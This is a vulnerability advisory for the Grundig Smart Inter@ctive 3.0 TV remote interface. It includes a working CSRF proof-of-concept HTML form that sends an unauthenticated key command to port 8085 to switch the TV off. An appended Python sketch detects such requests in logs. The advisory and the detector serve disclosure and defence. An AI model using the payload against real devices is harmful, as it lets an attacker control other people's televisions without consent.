Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference

2018.07.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Grundig Smart Remote App CSRF
# Google Dork: Local Vulnerability
# Date: 06.07.2018
# Exploit Author: Ahmethan GÜLTEKİN ~ @inject0r16
# Vendor Homepage: https://www.grundig.com/
# Software Link: https://play.google.com/store/apps/details?id=arcelik.android.grundig.remote
# Version: Grundig Smart Inter@ctive 3.0
# Tested on: Windows 7-8-10
# CVE : none

Hello!

I was trying out my TV. I saw a Grundig remote control application on Google Play. I downloaded the APK to my computer and decompiled it, and I began to examine the individual classes. I noticed in a class that a request was sent during operations on the command line.

I downloaded a packet viewer for the phone, opened the control application and performed some operations. And I saw that there was a request like this:

GET /sendrcpackage?keyid=-2547&keysymbol=-4078 HTTP/1.1

I noticed that each process has an id value. Then I turned off the television using the control application and noted the outgoing IDs.

The only requirement for the connection between the TV and the application was to have the same IP address. After I made the IP address on the TV and the phone and the IP address on the computer the same, I accessed the interface on port 8085.

Now I could do anything from the computer :)

CSRF POC :

<html>
<head>
<title>Grundig TV PoC</title>
</head>
<body>
<h1>Grundig Inter@ctive 3 Shutdown PoC</h1>
<form method="POST" action="http://TargetIP:8085/sendrcpackage?keyid=-2544&keysymbol=-4081">
<input type="submit" value="Go!">
</form>
</body>
</html>

This PoC will turn off the television when it is running. :)

Video about the vulnerability: https://youtu.be/H7WYTkgtwsY

#MoreThanYouImagine! ~ ahmeth4n.org

greetz : @SmashTheKernel , @t3beq , @c_c0re

References:

https://youtu.be/H7WYTkgtwsY
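
Detection sketch for the request described above. This is an added example, not part of the original advisory or any vendor code. The log layout (time, client IP, method, URL, Referer), the IP addresses and the example.test referer are constructed assumptions; only port 8085, the /sendrcpackage path and the keyid/keysymbol parameters come from the advisory.

```python
from urllib.parse import urlsplit, parse_qs

TV_PORT = 8085                 # port named in the advisory
TV_PATH = "/sendrcpackage"     # endpoint named in the advisory

# Constructed sample records: time, client IP, method, URL, Referer ("-" = none).
SAMPLE_LOG = """\
2018-07-06T20:01:11 192.168.1.20 GET http://192.168.1.50:8085/sendrcpackage?keyid=-2547&keysymbol=-4078 -
2018-07-06T20:03:40 192.168.1.31 POST http://192.168.1.50:8085/sendrcpackage?keyid=-2544&keysymbol=-4081 http://example.test/page.html
2018-07-06T20:04:02 192.168.1.31 GET http://192.168.1.50:8080/index.html -
2018-07-06T20:05:19 192.168.1.77 GET http://192.168.1.50:8085/sendrcpackage?keyid=-2544&keysymbol=-4081 -
"""

def flag_remote_key_requests(log_text, tv_hosts, approved_clients):
    """Return one finding per key-press request that did not come from an
    approved controller or that carries a Referer from another origin."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed records
        when, client, method, url, referer = parts
        target = urlsplit(url)
        if target.hostname not in tv_hosts or target.port != TV_PORT:
            continue  # not the TV's control port
        if target.path != TV_PATH:
            continue  # not the remote-key endpoint
        query = parse_qs(target.query)
        reasons = []
        if client not in approved_clients:
            reasons.append("unapproved-client")
        # A Referer from a different host means a web page triggered the request.
        if referer != "-" and urlsplit(referer).hostname not in tv_hosts:
            reasons.append("cross-site-referer")
        if reasons:
            findings.append({
                "time": when, "client": client, "method": method,
                "keyid": query.get("keyid", [None])[0],
                "keysymbol": query.get("keysymbol", [None])[0],
                "reasons": reasons,
            })
    return findings

if __name__ == "__main__":
    for f in flag_remote_key_requests(SAMPLE_LOG, {"192.168.1.50"}, {"192.168.1.20"}):
        print(f)
```

Because the endpoint accepts commands from any host that can reach port 8085, the approved-client list here is a monitoring aid only; restricting which hosts can reach the TV on the network is the actual control.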

